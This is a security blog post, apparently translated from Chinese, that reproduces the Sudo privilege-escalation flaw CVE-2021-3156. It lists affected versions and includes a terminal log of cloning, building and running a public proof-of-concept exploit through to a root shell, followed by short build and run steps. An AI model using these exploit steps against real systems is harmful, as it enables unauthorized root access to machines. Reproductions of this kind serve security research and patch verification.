Linux Sudo Permission Promotion Vulnerability (CVE-2021-3156) reappears

I. Introduction of vulnerabilities

When Sudo runs a command in shell mode with the -s or -i command line options, it escapes special characters with backslashes in command arguments. But when sudoEdit is run with the -s or -i flags, it is not actually escaped, potentially causing a buffer overflow. As long as the sudoers file exists (typically /etc/sudoers), an attacker can use sudo as a local common user to gain root access to the system.

Second, impact version

Sudo 1.8.2-1.8.31 p2

Sudo 1.9.0-1.9.5 p1

Unaffected version

Sudo = > 1.9.5 p2

Third, vulnerability recurrence

Obtain root permission:

Specific operation process:  ubuntu@VM-0-5-ubuntu:~$ git clone https://github.91chifun.workers.dev//https://github.com/blasty/CVE-2021-3156.git Cloning into 'CVE-2021-3156'... warning: redirecting to https://github.com.cnpmjs.org/blasty/CVE-2021-3156.git/ remote: Enumerating objects: 11, done. remote: Counting objects: 100% (11/11), done. remote: Compressing objects: 100% (9/9), done. remote: Total 11 (delta 2), reused 11 (delta 2), pack-reused 0 Unpacking objects: 100% (11/11), done. ubuntu@VM-0-5-ubuntu:~$ cd C Cerberus/ CVE-2020-13942/ CVE-2020-14882_ALL/ CVE-2020-8193/ CVE-2021-3156/ ubuntu@VM-0-5-ubuntu:~$ cd CVE-2021-3156/ ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ make rm -rf libnss_X mkdir libnss_X gcc -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich ** CVE-2021-3156 PoC by blasty <[email protected]> usage: ./sudo-hax-me-a-sandwich <target> available targets: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, 1) Debian 10.0 (Buster) - Sudo 1.8.27, Libc - 2.28 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ubuntu @ VM - 0-5 - ubuntu: ~ $sudo/CVE - 2021-3156 - V Sudo version 1.8.21 P2 Sudoers Policy Plugin version 1.8.21 P2 Sudoers file Grammar Version 46 Sudoers I/O Plugin Version 1.8.21p2 ubuntu@VM-0-5-ubuntu:~/CVE-2021-3156$./sudo-hax-me-a-sandwich 0 ** CVE-2021-3156 PoC by blasty <[email protected]> Using target: 'Ubuntu 20.04.1 (Focal Fossa) -sudo 1.8.31, libc-2.31' ** Pray for your rootshell.. ** [+] bl1ng bl1ng! We got it! # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare),500(ubuntu) #Copy the code

Exp address:

https://github.com/blasty/CVE-2021-3156
Copy the code

Operation steps:

build:

$ make
list targets:

$ ./sudo-hax-me-a-sandwich
run:

$ ./sudo-hax-me-a-sandwich <target_number>

Copy the code

Reference:

Github.com/blasty/CVE-…

Blog.csdn.net/Vdieoo/arti…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…